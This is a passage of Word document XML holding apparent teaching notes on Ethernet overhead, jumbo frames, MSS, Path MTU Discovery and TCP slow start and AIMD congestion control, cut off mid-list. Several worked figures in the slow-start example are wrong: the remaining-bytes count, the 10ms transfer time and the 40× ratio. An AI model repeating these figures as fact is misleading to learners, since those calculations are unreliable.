    <w:p w14:paraId="28C2136F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Ethernet frame:      38 bytes overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38704E09" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  preamble (7 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476E7866" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  SFD start of frame delimiter (1 byte)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DC5AE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  dst_mac (6 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F65A23D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  src_mac (6 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090DEC15" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  EtherType (2 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7626A702" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  FCS frame check sequence (4 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E1FF92" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  IFG interframe gap (12 bytes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50166A04" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EDFD77" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total overhead for 1 byte: ~590 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732161D2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Efficiency: 1 / 591 = 0.17%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B299D7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For small packets (DNS queries, gaming traffic, VoIP), protocol overhead dominates.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> A 64-byte DNS query over Ethernet+IPv4+UDP has 42 bytes of headers = 66% overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C4C450" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>For large transfers (file downloads, video streaming), overhead becomes negligible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAC30E4" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A 9000-byte jumbo frame with 40 bytes of headers = 0.44% overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC702B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Jumbo frames in data centers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C81D8D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Standard Ethernet MTU (Maximum Transmission Unit) is 1500 bytes. In data centers, </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>jumbo frames</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> with MTU=9000 bytes are common:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622294D8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>1500-byte MTU: 1460 bytes of TCP payload per segment. For 1Gbps at 1500-byte frames: 83,333 frames/second, 83,333 interrupts/second to process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B50E83" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1181"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>9000-byte MTU: 8960 bytes of TCP payload per segment. For 1Gbps at 9000-byte frames: 13,889 frames/second, 83% fewer interrupts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FAB4F2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Fewer interrupts = less CPU overhead for networking. Jumbo frames effectively increase application-layer throughput by reducing per-packet CPU cost, allowing more CPU time for actual data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC7D55" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The MSS (Maximum Segment Size):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7861026A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP negotiates MSS during the handshake — the maximum TCP payload size per segment. MSS = MTU - IP header - TCP header = 1500 - 20 - 20 = 1460 bytes for standard Ethernet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA682DC" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>If one host uses jumbo frames (MTU=9000) and the other uses standard Ethernet (MTU=1500), TCP negotiates the minimum MSS (1460 bytes). The jumbo-frame host sends 1460-byte segments even though it could send 8960-byte segments. </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path MTU Discovery (PMTUD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> detects the minimum MTU along the entire path and adjusts accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF7108E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PMTUD failure is a notorious production problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> If ICMP "Packet Too Big" messages are blocked by firewalls (common in corporate networks), PMTUD fails silently. TCP sends large segments that get fragmented or dropped by intermediate routers, causing mysterious connection hangs. The symptom: connections work for small data transfers but hang for large transfers (the large segments trigger the MTU mismatch). Fix: configure the firewall to allow ICMP type 3 code 4 ("Destination Unreachable: Fragmentation Needed").</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5343013C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:pict w14:anchorId="3C7CD550">
          <v:rect id="_x0000_i4471" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9338FB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. TCP Congestion Control — Bandwidth Allocation in Practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FDDB63" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP congestion control is the algorithm that determines how much bandwidth each flow uses when multiple flows share a link. It is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>primary mechanism</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for dividing available bandwidth among competing flows, and understanding it is essential for understanding why systems don't use available bandwidth even when it appears available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D63584" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Congestion Window and Slow Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCFC68C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>TCP's </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>congestion window (cwnd)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> is the sender's estimate of how much data can be in flight without overwhelming the network. It starts small and grows based on feedback from the network (acknowledgments = network is fine, packet loss = network is congested).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00A82D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slow Start — The Exponential Growth Phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D408C7A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Initial cwnd = IW (Initial Window) = 10 segments × MSS = 10 × 1460 = 14,600 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605A251F" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>On each ACK received: cwnd += MSS (one segment's worth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4EF963" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Since each ACK acknowledges one segment and adds one segment to cwnd, a full window of N segments generates N ACKs which increase cwnd by N segments. </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cwnd doubles each RTT</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> (exponential growth):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C25714" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F938DE2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 1: cwnd = 10 segments → send 10 → receive 10 ACKs → cwnd = 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB6D4FE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 2: cwnd = 20 segments → send 20 → receive 20 ACKs → cwnd = 40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4315EF76" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 3: cwnd = 40 segments → send 40 → receive 40 ACKs → cwnd = 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B905DE1" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6E5CAD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The slow start ceiling (ssthresh — slow start threshold):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E62DD2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>When cwnd reaches ssthresh, slow start ends and </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>congestion avoidance</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> begins — linear growth instead of exponential. Initial ssthresh is typically set to the maximum (64KB or the receiver's window size).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39788404" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>After packet loss</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>, ssthresh is set to half of cwnd at the time of loss, and cwnd is reset (to 1 for RTO-triggered loss, to ssthresh/2 for fast retransmit-triggered loss). Slow start restarts from the reduced cwnd and grows until it hits the new lower ssthresh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D662B" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The slow start problem for short flows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F55BDD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>A 100KB HTTP response over a 100ms RTT path:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1D167" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215B2507" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 0: Connection established</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A84866" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 1: cwnd=10 segments = 14.6KB → send 14.6KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EE3624" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 2: cwnd=20 segments = 29.2KB → send 29.2KB (remaining: 85.4KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579FC8AF" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 3: cwnd=40 segments = 58.4KB → send 58.4KB (remaining: 56.2KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2D7F6" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>RTT 4: cwnd covers all remaining → send all (56.2KB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4483D1E8" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total time: 4 RTTs = 400ms on a 100ms RTT path, regardless of available bandwidth. For a 100MB/s link with 100ms RTT, 100KB could be sent in 10ms if the full bandwidth were available. But slow start requires 400ms — </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>40× slower than the theoretical minimum</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> for this transfer size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10188D72" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>This is why </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>small HTTP responses have high latency even on high-bandwidth connections.</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> The bottleneck isn't bandwidth — it's slow start's inability to ramp up cwnd fast enough to utilize available bandwidth for short-lived connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F711ED" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP/2 connection reuse solves this:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> By reusing a single TCP connection for all requests (connection is established once, cwnd grows to full size and stays there), HTTP/2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:lastRenderedPageBreak/>
        <w:t>eliminates slow start overhead for subsequent requests. The cwnd is already at full size — requests immediately use full available bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59777DD3" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Congestion Avoidance — AIMD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5822E17D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Once cwnd passes ssthresh, TCP uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additive Increase Multiplicative Decrease (AIMD)</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D317072" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Additive Increase:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> On each RTT with no loss, cwnd += MSS (grows by one segment per RTT). Linear growth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB39ECD" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1182"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multiplicative Decrease:</w:t>
      </w:r>
      <w:r w:rsidRPr="00487CAD">
        <w:t> On packet loss, cwnd = cwnd/2 (or cwnd = 1 for severe loss). Aggressive reduction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E01310" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The AIMD sawtooth pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C481890" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E33EA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>cwnd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE76D8D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> │        /\      /\      /\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45628EBE" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> │       /  \    /  \    /  \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710AE4AA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> │      /    \  /    \  /    \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F33F33" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> │     /      \/      \/      \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC61AB" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> │    /       loss    loss     loss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CBA44E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t xml:space="preserve"> └────────────────────────────────→ time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B0D3D" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Cwnd grows linearly until packet loss, then halves, then grows linearly again. This sawtooth pattern is the signature of AIMD congestion control.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE7D340" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why AIMD converges to fair bandwidth allocation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9FFBEA" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD" w:rsidP="00487CAD">
      <w:r w:rsidRPr="00487CAD">
        <w:t>Two flows sharing a bottleneck link both run AIMD. When the link is overloaded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76902CA7" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Both experience packet loss simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140DEB0C" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Both halve their cwnd simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FEDFE2" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Total traffic on the link halves — congestion is relieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DFC79A" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
        <w:t>Both grow linearly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F94B5E" w14:textId="77777777" w:rsidR="00487CAD" w:rsidRPr="00487CAD" w:rsidRDefault="00487CAD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1183"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00487CAD">
